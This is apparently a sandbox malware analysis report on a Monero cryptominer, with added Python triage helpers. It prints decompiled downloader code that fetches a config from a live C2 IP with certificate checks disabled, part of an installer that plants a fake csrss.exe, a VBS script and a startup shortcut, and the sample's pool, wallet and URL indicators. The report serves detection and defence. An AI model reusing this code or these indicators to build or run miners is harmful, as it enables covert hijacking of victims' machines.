                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                                        • String ID: 0125789244697858$0125789244697858$0125789244697858$0125789244697858$100%CPU$100%CPU$100%CPU$1THREAD$48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$50%CPU$50%CPU$50%CPU$50%CPU$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07$http://45.144.225.135/config.txt$nicehash.com$pool.supportxmr.com:3333$viTRMUuKeV
                                                                                                        • API String ID: 2251294070-616098679
                                                                                                        • Opcode ID: 63a7a97f56231b37feb03491b86da1fcfebadef162383a41090c0d99037acd64
                                                                                                        • Instruction ID: 79ba011eff7c2b42f6b4b98f793f075dbd5f35932ed074bebd9c981619171c11
                                                                                                        • Opcode Fuzzy Hash: 63a7a97f56231b37feb03491b86da1fcfebadef162383a41090c0d99037acd64
                                                                                                        • Instruction Fuzzy Hash: 389126B4B803016AF730AF13DC53F6636A8A7B2F4DF14910EE502A62E5DBF554608B87
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%
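                                                                                                        The String ID field above packs every string this function references into one `$`-joined, duplicate-laden list, and it holds the indicators that matter for this sample: the config URL, the mining pool, the Monero wallet, the drop directory and the process names it watches for. The Python below is an added triage helper, not part of the Joe Sandbox report and not code from the sample: it splits that field, deduplicates it and groups the tokens. The category names and regexes are this helper's own convention; the wallet check is the standard 95-character base58, leading-'4' shape of a Monero mainnet address.

```python
import re
from urllib.parse import urlsplit

# Constructed input: the "String ID" field from this function's report block,
# copied verbatim. Joe Sandbox joins every referenced string with '$'.
STRING_ID = (
    "0125789244697858$0125789244697858$0125789244697858$0125789244697858$"
    "100%CPU$100%CPU$100%CPU$1THREAD$"
    "48QbPZUtWm8gG6T6eg6H7JGXaD6eNJH8o3RoyLgBeqym7TxydU9TfMfUUgaheqa7BFdhtfb9d665CgYDj6f5KvdjLeGJmdW$"
    "50%CPU$50%CPU$50%CPU$50%CPU$C:\\ProgramData\\LKBNMTFJgl$"
    "C:\\Users\\user\\AppData\\Local\\Temp\\4rC1bQcnl5.exe$FALSE$FALSE$FALSE$FALSE$GUID_ERROR$"
    "TASKMGR$TASKMGR$TRUE$TRUE$[no-email]$csrss.exe$d06ed635-68f6-4e9a-955c-4899f5f57b9a$"
    "d572da9202196121d952231f26d65d07$http://45.144.225.135/config.txt$nicehash.com$"
    "pool.supportxmr.com:3333$viTRMUuKeV"
)

# Monero mainnet standard address: 95 base58 characters, the first one '4'.
_BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")

# Category names and regexes are this helper's own convention. Order matters:
# a Windows path ending in .exe must be a path, not a process name, and
# "csrss.exe" must be caught before the host regexes would take it for a domain.
_PATTERNS = [
    ("url",          re.compile(r"^https?://", re.I)),
    ("md5",          re.compile(r"^[0-9a-f]{32}$", re.I)),
    ("guid",         re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)),
    ("win_path",     re.compile(r"^[A-Za-z]:\\")),
    ("process_name", re.compile(r"^[\w-]+\.(exe|dll|sys)$", re.I)),
    ("pool",         re.compile(r"^[\w.-]+\.[a-z]{2,}:\d{1,5}$", re.I)),
    ("domain",       re.compile(r"^[\w-]+(\.[\w-]+)*\.[a-z]{2,}$", re.I)),
]


def is_xmr_address(token):
    return len(token) == 95 and token[0] == "4" and set(token) <= _BASE58


def classify(token):
    if is_xmr_address(token):
        return "xmr_wallet"
    for name, pattern in _PATTERNS:
        if pattern.search(token):
            return name
    return "other"


def extract_iocs(string_id):
    """Split the '$'-joined field, drop duplicates (first-seen order kept)
    and group the tokens by category."""
    iocs = {}
    for token in dict.fromkeys(t for t in string_id.split("$") if t):
        iocs.setdefault(classify(token), []).append(token)
    return iocs


def network_blocklist(iocs):
    """Hosts worth blocking or alerting on: URL hosts, pool hosts, bare domains."""
    hosts = {urlsplit(u).hostname for u in iocs.get("url", [])}
    hosts |= {p.rsplit(":", 1)[0] for p in iocs.get("pool", [])}
    hosts |= set(iocs.get("domain", []))
    return hosts


if __name__ == "__main__":
    found = extract_iocs(STRING_ID)
    for category, tokens in found.items():
        print(f"{category:13s} {tokens}")
    print("blocklist:", sorted(network_blocklist(found)))
```

                                                                                                        The "other" bucket (TRUE/FALSE, 100%CPU, 50%CPU, TASKMGR, 1THREAD, [no-email]) is not noise: those are the option names and defaults the sample reads from the fetched config, so they are what to look for in the decrypted config body and in any sibling samples.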

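                                                                                                        The decompiled function that follows (E01464B00) is the sample's config downloader. It cracks the URL with InternetCrackUrlA, opens a WinINet request whose flag word carries INTERNET_FLAG_SECURE (0x84ecf300 rather than 0x846cf300) when the URL contains "https://", and on that branch ORs 0x180 (SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_REVOCATION) into INTERNET_OPTION_SECURITY_FLAGS (option 0x1f), so a self-signed or revoked certificate on the C2 is accepted. It then reads the body in 0x400-byte requests into a buffer realloc'd after every read, grows the request by 0x400 only on ERROR_INSUFFICIENT_BUFFER (0x7a), stops at a zero-length read, and keeps only what precedes a ";End" marker; a body without the marker is discarded. The Python below is an added offline emulation of that read loop, not code from the report or the sample. The FakeResponse class and the body it serves are constructed for the test and say nothing about what 45.144.225.135/config.txt actually returned.

```python
# Added emulation (not from the report or the sample) of E01464B00's read loop.
ERROR_INSUFFICIENT_BUFFER = 0x7A   # the one GetLastError() value the loop tolerates
CHUNK = 0x400                      # initial malloc size and per-retry growth step
END_MARKER = b";End"               # the sample truncates the body at this marker


class FakeResponse:
    """Constructed stand-in for an InternetReadFile handle.

    Serves `body` in pieces of at most `piece` bytes and, if `fail_on_read`
    is set, fails that read (1-based) with `fail_error` so the retry path is
    exercised. read() returns (ok, data, last_error), mirroring the Win32 call.
    """

    def __init__(self, body, piece=300, fail_on_read=None,
                 fail_error=ERROR_INSUFFICIENT_BUFFER):
        self.body, self.piece = body, piece
        self.fail_on_read, self.fail_error = fail_on_read, fail_error
        self.pos = 0
        self.reads = 0

    def read(self, max_len):
        self.reads += 1
        if self.reads == self.fail_on_read:
            return False, b"", self.fail_error
        data = self.body[self.pos:self.pos + min(max_len, self.piece)]
        self.pos += len(data)
        return True, data, 0


def fetch_config(resp):
    """Mirror of the L10..L23 loop in E01464B00: returns the body up to
    ';End', or None wherever the sample frees the buffer and returns 0."""
    want, total = CHUNK, 0
    buf = bytearray(want)                       # E014615E0(0x400): malloc
    while True:
        ok, data, err = resp.read(want)         # InternetReadFile(h, buf+total, want, &n)
        if not ok:
            if err != ERROR_INSUFFICIENT_BUFFER:
                return None                     # any other error: free, close, return 0
            want += CHUNK                       # ask for more next time, keep what we have
        elif not data:                          # n == 0: response complete
            idx = buf.find(END_MARKER)          # E014618D0(buf, ";End"): strstr-like
            return bytes(buf[:idx]) if idx >= 0 else None   # marker missing: discard
        else:
            buf[total:total + len(data)] = data
            total += len(data)
        # E014616A0(buf, want + total): realloc so the next read of `want` bytes fits.
        # The sample never writes a NUL after the data; zero-filling stands in for that.
        if len(buf) < want + total:
            buf.extend(bytes(want + total - len(buf)))


if __name__ == "__main__":
    body = b"CONSTRUCTED_SAMPLE key=value;End\r\n<trailing bytes ignored>"
    print(fetch_config(FakeResponse(body)))
```

                                                                                                        Two things this makes visible for detection and for writing a replacement C2: anything after ";End" in the response is thrown away, so a sinkhole only needs to terminate its reply with that marker, and the request itself is a plain GET with the fixed User-Agent "WinInetGet/0.1" and cookies, redirects and UI all disabled by the flag word, which is a narrow enough signature to alert on.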
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E01464B00(void* __ecx, void* __edx, void* __eflags, char* _a4) {
                                                                                                        				void* _v8;
                                                                                                        				void _v12;
                                                                                                        				void* _v16;
                                                                                                        				void* _v20;
                                                                                                        				long _v24;
                                                                                                        				long _v28;
                                                                                                        				long _v32;
                                                                                                        				char* _v36;
                                                                                                        				char* _v40;
                                                                                                        				char* _v44;
                                                                                                        				char* _v48;
                                                                                                        				char* _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				intOrPtr _v64;
                                                                                                        				char* _v68;
                                                                                                        				short _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v104;
                                                                                                        				char _v108;
                                                                                                        				void* _v112;
                                                                                                        				long _t54;
                                                                                                        				int _t55;
                                                                                                        				void* _t61;
                                                                                                        				void* _t62;
                                                                                                        				void* _t71;
                                                                                                        				long _t87;
                                                                                                        				char* _t91;
                                                                                                        				long _t108;
                                                                                                        				void* _t111;
                                                                                                        				char* _t118;
                                                                                                        				long _t119;
                                                                                                        				char* _t123;
                                                                                                        				void* _t126;
                                                                                                        				void* _t128;
                                                                                                        				void* _t134;
                                                                                                        				void* _t136;
                                                                                                        				void* _t137;
                                                                                                        				void* _t138;
                                                                                                        				void* _t139;
                                                                                                        				void* _t140;
                                                                                                        
                                                                                                        				E01461BB0( &_v108, 0, 0x38);
                                                                                                        				_t118 = _a4;
                                                                                                        				_v24 = 0;
                                                                                                        				_t108 = 0;
                                                                                                        				_v112 = 0x3c; // URL_COMPONENTSA.dwStructSize (60 bytes on 32-bit); the -1 lengths below make InternetCrackUrlA point into _a4
                                                                                                        				_v92 = 0xffffffff;
                                                                                                        				_v104 = 0xffffffff;
                                                                                                        				_v64 = 0xffffffff;
                                                                                                        				_v56 = 0xffffffff;
                                                                                                        				_t54 = E01461850(_t118);
                                                                                                        				_t136 = _t134 + 0x10;
                                                                                                        				_t55 = InternetCrackUrlA(_t118, _t54, 0,  &_v112);
                                                                                                        				if(_t55 != 0) {
                                                                                                        					_t123 = E014615E0(_v92 + 1);
                                                                                                        					E01461BB0(_t123, 0, _v92 + 1);
                                                                                                        					E01461640(_t123, _v96, _v92);
                                                                                                        					_t137 = _t136 + 0x1c;
                                                                                                        				_t61 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0); // fixed User-Agent: usable as a network signature
                                                                                                        					_v8 = _t61;
                                                                                                        					if(_t61 != 0) {
                                                                                                        						_t62 = InternetConnectA(_t61, _t123, _v88, 0, 0, 3, 0, 0);
                                                                                                        						_v20 = _t62;
                                                                                                        						_push(_t123);
                                                                                                        						if(_t62 != 0) {
                                                                                                        							E01461510();
                                                                                                        							E014618D0(_t118, "https://");
                                                                                                        							_t138 = _t137 + 0xc;
                                                                                                        							_v52 = "text/*";
                                                                                                        							_v48 = "application/exe";
                                                                                                        							_v44 = "application/zlib";
                                                                                                        				_t125 =  !=  ? 0x84ecf300 : 0x846cf300; // decompiler lost the operand: the strstr-like E014618D0(_t118, "https://") result above selects the flag word with INTERNET_FLAG_SECURE (0x00800000)
                                                                                                        							_v40 = "application/gzip";
                                                                                                        							_v36 = "application/applefile";
                                                                                                        							_v32 = 0;
                                                                                                        				_t126 = HttpOpenRequestA(_v20, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0); // both flag words include INTERNET_FLAG_RELOAD | NO_CACHE_WRITE | NO_AUTO_REDIRECT | NO_COOKIES | NO_UI | IGNORE_CERT_CN_INVALID | IGNORE_CERT_DATE_INVALID; they differ only by INTERNET_FLAG_SECURE
                                                                                                        							_v16 = _t126;
                                                                                                        							if(_t126 == 0) {
                                                                                                        								L26:
                                                                                                        								InternetCloseHandle(_v20);
                                                                                                        								InternetCloseHandle(_v8);
                                                                                                        								return 0;
                                                                                                        							} else {
                                                                                                        								_t71 = E014618D0(_t118, "https://");
                                                                                                        								_t139 = _t138 + 8;
                                                                                                        								if(_t71 == 0) {
                                                                                                        									L10:
                                                                                                        									if(HttpSendRequestA(_t126, 0, 0, 0, 0) == 0) {
                                                                                                        										goto L25;
                                                                                                        									} else {
                                                                                                        							_t119 = 0x400; // read size; grown by 0x400 whenever InternetReadFile reports ERROR_INSUFFICIENT_BUFFER
                                                                                                        										_t128 = E014615E0(0x400);
                                                                                                        										_t140 = _t139 + 4;
                                                                                                        										if(_t128 == 0) {
                                                                                                        											_t126 = _v16;
                                                                                                        											goto L25;
                                                                                                        										} else {
                                                                                                        											do {
                                                                                                        												if(InternetReadFile(_v16, _t128 + _t108, _t119,  &_v24) == 0) {
                                                                                                        								if(GetLastError() != 0x7a) { // 0x7a == ERROR_INSUFFICIENT_BUFFER: the only read failure that is retried
                                                                                                        														E01461510(_t128);
                                                                                                        														L23:
                                                                                                        														InternetCloseHandle(_v16);
                                                                                                        														InternetCloseHandle(_v20);
                                                                                                        														InternetCloseHandle(_v8);
                                                                                                        														return 0;
                                                                                                        													} else {
                                                                                                        														_t119 = _t119 + 0x400;
                                                                                                        														goto L17;
                                                                                                        													}
                                                                                                        												} else {
                                                                                                        													_t87 = _v24;
                                                                                                        													if(_t87 == 0) {
                                                                                                        														InternetCloseHandle(_v16);
                                                                                                        														InternetCloseHandle(_v20);
                                                                                                        														_t111 = _v8;
                                                                                                        														InternetCloseHandle(_t111);
                                                                                                        								_t91 = E014618D0(_t128, ";End"); // strstr-like: the body is kept only up to ";End"; note no NUL was written after the data before the search
                                                                                                        														if(_t91 != 0) {
                                                                                                        															 *_t91 = 0;
                                                                                                        															return _t128;
                                                                                                        														} else {
                                                                                                        															E01461510(_t128);
                                                                                                        															InternetCloseHandle(_v16);
                                                                                                        															InternetCloseHandle(_v20);
                                                                                                        															InternetCloseHandle(_t111);
                                                                                                        															return 0;
                                                                                                        														}
                                                                                                        													} else {
                                                                                                        														_t108 = _t108 + _t87;
                                                                                                        														goto L17;
                                                                                                        													}
                                                                                                        												}
                                                                                                        												goto L27;
                                                                                                        												L17:
                                                                                                        												_t128 = E014616A0(_t128, _t119 + _t108);
                                                                                                        												_t140 = _t140 + 8;
                                                                                                        											} while (_t128 != 0);
                                                                                                        											goto L23;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								} else {
                                                                                                        									_v12 = 0;
                                                                                                        									_v28 = 4;
                                                                                                        								if(InternetQueryOptionA(_t126, 0x1f,  &_v12,  &_v28) == 0) { // https only: 0x1f == INTERNET_OPTION_SECURITY_FLAGS
                                                                                                        										L25:
                                                                                                        										InternetCloseHandle(_t126);
                                                                                                        										goto L26;
                                                                                                        									} else {
                                                                                                        										_v12 = _v12 | 0x00000180;
                                                                                                        										if(InternetSetOptionA(_t126, 0x1f,  &_v12, 4) == 0) {
                                                                                                        											goto L25;
                                                                                                        										} else {
                                                                                                        											goto L10;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							E01461510();
                                                                                                        							InternetCloseHandle(_v8);
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						E01461510(_t123);
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					return _t55;
                                                                                                        				}
                                                                                                        				L27:
                                                                                                        			}

                                                                                                        [Instruction address gutter for the listing above omitted: one address per decompiled line, ranging from 0x01464b10 to 0x01464dd4 in the 0x01460000-based dump, with 0x00000000 marking unresolved targets.]

                                                                                                        APIs
                                                                                                        • InternetCrackUrlA.WININET(7519EA30,00000000,?,?,00000000,00000000), ref: 01464B57
                                                                                                        • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 01464B9D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CrackOpen
                                                                                                        • String ID: ;End$<$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                        • API String ID: 1262293563-2187584305
                                                                                                        • Opcode ID: ea9e24554e1051ae4cf2f1b153b639cfbe680dd29d4419b6e3faeeb5ac337be5
                                                                                                        • Instruction ID: d95c71e5fe2e27d8be259b3a366befb4b71782b004b118c622d0b3335f7ff76f
                                                                                                        • Opcode Fuzzy Hash: ea9e24554e1051ae4cf2f1b153b639cfbe680dd29d4419b6e3faeeb5ac337be5
                                                                                                        • Instruction Fuzzy Hash: CB81F971E00219ABEB11ABA5EC45FEFBBBCEF5075CF14016AE904F62A0D77159018792
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E01467C30(void* __ecx, void* __edx, void* __eflags, char* _a4, intOrPtr* _a8) {
                                                                                                        				void _v8;
                                                                                                        				void* _v12;
                                                                                                        				void* _v16;
                                                                                                        				void* _v20;
                                                                                                        				long _v24;
                                                                                                        				long _v28;
                                                                                                        				long _v32;
                                                                                                        				char* _v36;
                                                                                                        				char* _v40;
                                                                                                        				char* _v44;
                                                                                                        				char* _v48;
                                                                                                        				char* _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				intOrPtr _v64;
                                                                                                        				char* _v68;
                                                                                                        				short _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				intOrPtr _v96;
                                                                                                        				intOrPtr _v104;
                                                                                                        				char _v108;
                                                                                                        				void* _v112;
                                                                                                        				long _t53;
                                                                                                        				int _t54;
                                                                                                        				void* _t62;
                                                                                                        				void* _t63;
                                                                                                        				void* _t72;
                                                                                                        				long _t88;
                                                                                                        				long _t103;
                                                                                                        				char* _t108;
                                                                                                        				intOrPtr _t109;
                                                                                                        				char* _t111;
                                                                                                        				void* _t114;
                                                                                                        				long _t116;
                                                                                                        				void* _t123;
                                                                                                        				void* _t125;
                                                                                                        				void* _t126;
                                                                                                        				void* _t127;
                                                                                                        				void* _t128;
                                                                                                        				void* _t129;
                                                                                                        
                                                                                                        				E01461BB0( &_v108, 0, 0x38);
                                                                                                        				_t108 = _a4;
                                                                                                        				_v24 = 0;
                                                                                                        				_t103 = 0;
                                                                                                        				_v112 = 0x3c;
                                                                                                        				_v92 = 0xffffffff;
                                                                                                        				_v104 = 0xffffffff;
                                                                                                        				_v64 = 0xffffffff;
                                                                                                        				_v56 = 0xffffffff;
                                                                                                        				_t53 = E01461850(_t108);
                                                                                                        				_t125 = _t123 + 0x10;
                                                                                                        				_t54 = InternetCrackUrlA(_t108, _t53, 0,  &_v112);
                                                                                                        				if(_t54 != 0) {
                                                                                                        					_t111 = E014615E0(_v92 + 1);
                                                                                                        					E01461BB0(_t111, 0, _v92 + 1);
                                                                                                        					E01461640(_t111, _v96, _v92);
                                                                                                        					_t126 = _t125 + 0x1c;
                                                                                                        					_t62 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
                                                                                                        					_v20 = _t62;
                                                                                                        					if(_t62 != 0) {
                                                                                                        						_t63 = InternetConnectA(_t62, _t111, _v88, 0, 0, 3, 0, 0);
                                                                                                        						_v16 = _t63;
                                                                                                        						_push(_t111);
                                                                                                        						if(_t63 != 0) {
                                                                                                        							E01461510();
                                                                                                        							E014618D0(_t108, "https://");
                                                                                                        							_t127 = _t126 + 0xc;
                                                                                                        							_v52 = "text/*";
                                                                                                        							_v48 = "application/exe";
                                                                                                        							_v44 = "application/zlib";
                                                                                                        							_t113 =  !=  ? 0x84ecf300 : 0x846cf300;
                                                                                                        							_v40 = "application/gzip";
                                                                                                        							_v36 = "application/applefile";
                                                                                                        							_v32 = 0;
                                                                                                        							_t114 = HttpOpenRequestA(_v16, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
                                                                                                        							_v12 = _t114;
                                                                                                        							if(_t114 == 0) {
                                                                                                        								L24:
                                                                                                        								InternetCloseHandle(_v16);
                                                                                                        								InternetCloseHandle(_v20);
                                                                                                        								return 0;
                                                                                                        							} else {
                                                                                                        								_t72 = E014618D0(_t108, "https://");
                                                                                                        								_t128 = _t127 + 8;
                                                                                                        								if(_t72 == 0) {
                                                                                                        									L10:
                                                                                                        									if(HttpSendRequestA(_t114, 0, 0, 0, 0) == 0) {
                                                                                                        										goto L23;
                                                                                                        									} else {
                                                                                                        										_t116 = 0x400;
                                                                                                        										_t109 = E014615E0(0x400);
                                                                                                        										_t129 = _t128 + 4;
                                                                                                        										if(_t109 == 0) {
                                                                                                        											_t114 = _v12;
                                                                                                        											goto L23;
                                                                                                        										} else {
                                                                                                        											do {
                                                                                                        												if(InternetReadFile(_v12, _t109 + _t103, _t116,  &_v24) == 0) {
                                                                                                        													if(GetLastError() != 0x7a) {
                                                                                                        														E01461510(_t109);
                                                                                                        														L21:
                                                                                                        														InternetCloseHandle(_v12);
                                                                                                        														InternetCloseHandle(_v16);
                                                                                                        														InternetCloseHandle(_v20);
                                                                                                        														return 0;
                                                                                                        													} else {
                                                                                                        														_t116 = _t116 + 0x400;
                                                                                                        														goto L15;
                                                                                                        													}
                                                                                                        												} else {
                                                                                                        													_t88 = _v24;
                                                                                                        													if(_t88 == 0) {
                                                                                                        														InternetCloseHandle(_v12);
                                                                                                        														InternetCloseHandle(_v16);
                                                                                                        														InternetCloseHandle(_v20);
                                                                                                        														 *_a8 = _t109;
                                                                                                        														return _t103;
                                                                                                        													} else {
                                                                                                        														_t103 = _t103 + _t88;
                                                                                                        														goto L15;
                                                                                                        													}
                                                                                                        												}
                                                                                                        												goto L25;
                                                                                                        												L15:
                                                                                                        												_t109 = E014616A0(_t109, _t116 + _t103);
                                                                                                        												_t129 = _t129 + 8;
                                                                                                        											} while (_t109 != 0);
                                                                                                        											goto L21;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								} else {
                                                                                                        									_v8 = 0;
                                                                                                        									_v28 = 4;
                                                                                                        									if(InternetQueryOptionA(_t114, 0x1f,  &_v8,  &_v28) == 0) {
                                                                                                        										L23:
                                                                                                        										InternetCloseHandle(_t114);
                                                                                                        										goto L24;
                                                                                                        									} else {
                                                                                                        										_v8 = _v8 | 0x00000180;
                                                                                                        										if(InternetSetOptionA(_t114, 0x1f,  &_v8, 4) == 0) {
                                                                                                        											goto L23;
                                                                                                        										} else {
                                                                                                        											goto L10;
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							E01461510();
                                                                                                        							InternetCloseHandle(_v20);
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						E01461510(_t111);
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					return _t54;
                                                                                                        				}
                                                                                                        				L25:
                                                                                                        			}
                                                                                                        0x01467c40
                                                                                                        0x01467c45
                                                                                                        0x01467c4e
                                                                                                        0x01467c55
                                                                                                        0x01467c57
                                                                                                        0x01467c5e
                                                                                                        0x01467c65
                                                                                                        0x01467c6f
                                                                                                        0x01467c76
                                                                                                        0x01467c7d
                                                                                                        0x01467c82
                                                                                                        0x01467c87
                                                                                                        0x01467c8f
                                                                                                        0x01467ca2
                                                                                                        0x01467cac
                                                                                                        0x01467cb8
                                                                                                        0x01467cbd
                                                                                                        0x01467ccd
                                                                                                        0x01467cd3
                                                                                                        0x01467cd8
                                                                                                        0x01467cfb
                                                                                                        0x01467d01
                                                                                                        0x01467d04
                                                                                                        0x01467d07
                                                                                                        0x01467d23
                                                                                                        0x01467d33
                                                                                                        0x01467d38
                                                                                                        0x01467d3b
                                                                                                        0x01467d44
                                                                                                        0x01467d50
                                                                                                        0x01467d57
                                                                                                        0x01467d5a
                                                                                                        0x01467d67
                                                                                                        0x01467d76
                                                                                                        0x01467d87
                                                                                                        0x01467d89
                                                                                                        0x01467d8e
                                                                                                        0x01467eb2
                                                                                                        0x01467eb5
                                                                                                        0x01467ec3
                                                                                                        0x01467ecd
                                                                                                        0x01467d94
                                                                                                        0x01467d9a
                                                                                                        0x01467d9f
                                                                                                        0x01467da4
                                                                                                        0x01467de7
                                                                                                        0x01467df8
                                                                                                        0x00000000
                                                                                                        0x01467dfe
                                                                                                        0x01467dfe
                                                                                                        0x01467e09
                                                                                                        0x01467e0b
                                                                                                        0x01467e10
                                                                                                        0x01467ea7
                                                                                                        0x00000000
                                                                                                        0x01467e16
                                                                                                        0x01467e16
                                                                                                        0x01467e2a
                                                                                                        0x01467e53
                                                                                                        0x01467e81
                                                                                                        0x01467e89
                                                                                                        0x01467e92
                                                                                                        0x01467e97
                                                                                                        0x01467e9c
                                                                                                        0x01467ea6
                                                                                                        0x01467e55
                                                                                                        0x01467e55
                                                                                                        0x00000000
                                                                                                        0x01467e55
                                                                                                        0x01467e2c
                                                                                                        0x01467e2c
                                                                                                        0x01467e31
                                                                                                        0x01467e66
                                                                                                        0x01467e6b
                                                                                                        0x01467e70
                                                                                                        0x01467e78
                                                                                                        0x01467e7f
                                                                                                        0x01467e33
                                                                                                        0x01467e33
                                                                                                        0x00000000
                                                                                                        0x01467e33
                                                                                                        0x01467e31
                                                                                                        0x00000000
                                                                                                        0x01467e35
                                                                                                        0x01467e3f
                                                                                                        0x01467e41
                                                                                                        0x01467e44
                                                                                                        0x00000000
                                                                                                        0x01467e48
                                                                                                        0x01467e10
                                                                                                        0x01467da6
                                                                                                        0x01467da9
                                                                                                        0x01467db0
                                                                                                        0x01467dc3
                                                                                                        0x01467eaa
                                                                                                        0x01467eb0
                                                                                                        0x00000000
                                                                                                        0x01467dc9
                                                                                                        0x01467dc9
                                                                                                        0x01467de1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x01467de1
                                                                                                        0x01467dc3
                                                                                                        0x01467da4
                                                                                                        0x01467d09
                                                                                                        0x01467d09
                                                                                                        0x01467d14
                                                                                                        0x01467d22
                                                                                                        0x01467d22
                                                                                                        0x01467cda
                                                                                                        0x01467cdb
                                                                                                        0x01467ceb
                                                                                                        0x01467ceb
                                                                                                        0x01467c96
                                                                                                        0x01467c96
                                                                                                        0x01467c96
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • InternetCrackUrlA.WININET(00000044,00000000,?,?,?,00000000), ref: 01467C87
                                                                                                        • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01467CCD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000011.00000002.495500210.0000000001460000.00000040.00000001.sdmp, Offset: 01460000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CrackOpen
                                                                                                        • String ID: <$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                        • API String ID: 1262293563-3953569400
                                                                                                        • Opcode ID: 5fbe5cac426734d5f1fa57e66ff7e9978334329dd9a89821fa697274404da596
                                                                                                        • Instruction ID: 11af624277f397a0418d57875e2f0583f327e64c4b42536d4f0cd0793b672a57
                                                                                                        • Opcode Fuzzy Hash: 5fbe5cac426734d5f1fa57e66ff7e9978334329dd9a89821fa697274404da596
                                                                                                        • Instruction Fuzzy Hash: F671C671E00209AFEB119FA5DC45BEEBBBCEF4076DF20012BE904F62A0D77159058B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E014665D0(void* __eflags) {
                                                                                                        				short _v524;
                                                                                                        				short _v1044;
                                                                                                        				short _v1564;
                                                                                                        				char _v2588;
                                                                                                        				char _v3612;
                                                                                                        				char _v4636;
                                                                                                        				void* _t61;
                                                                                                        				void* _t69;
                                                                                                        				void* _t71;
                                                                                                        				void* _t73;
                                                                                                        				void* _t100;
                                                                                                        				void* _t102;
                                                                                                        				void* _t103;
                                                                                                        				void* _t105;
                                                                                                        				void* _t128;
                                                                                                        				void* _t134;
                                                                                                        				void* _t141;
                                                                                                        				void* _t142;
                                                                                                        				void* _t143;
                                                                                                        				void* _t144;
                                                                                                        				void* _t145;
                                                                                                        				void* _t146;
                                                                                                        				void* _t150;
                                                                                                        
                                                                                                        				E01461A00( &_v524, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        				E01461970( &_v524, "\\");
                                                                                                        				E01461970( &_v524, "csrss.exe");
                                                                                                        				 *((short*)(_t141 + E01461B40( &_v524) * 2 - 0x210)) = 0;
                                                                                                        				E01461A00( &_v1044, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        				E01461970( &_v1044, L"\\r.vbs");
                                                                                                        				_t61 = E01467FA0(0,  &_v3612, 0x146aad0, 7);
                                                                                                        				_t143 = _t142 + 0x38;
                                                                                                        				if(_t61 != 0) {
                                                                                                        					E01461970( &_v3612, "\\");
                                                                                                        					E01461970( &_v3612, "viTRMUuKeV");
                                                                                                        					E01461970( &_v3612, L".url");
                                                                                                        					_t69 = E01466340( &_v524);
                                                                                                        					_t144 = _t143 + 0x1c;
                                                                                                        					__eflags = _t69;
                                                                                                        					if(_t69 == 0) {
                                                                                                        						goto L1;
                                                                                                        					} else {
                                                                                                        						_t71 = E01467EF0("a2guard.exe");
                                                                                                        						_t145 = _t144 + 4;
                                                                                                        						__eflags = _t71;
                                                                                                        						if(_t71 != 0) {
                                                                                                        							L10:
                                                                                                        							_t73 = E01467ED0( &_v3612);
                                                                                                        							_t146 = _t145 + 4;
                                                                                                        							__eflags = _t73;
                                                                                                        							if(_t73 != 0) {
                                                                                                        								goto L13;
                                                                                                        							} else {
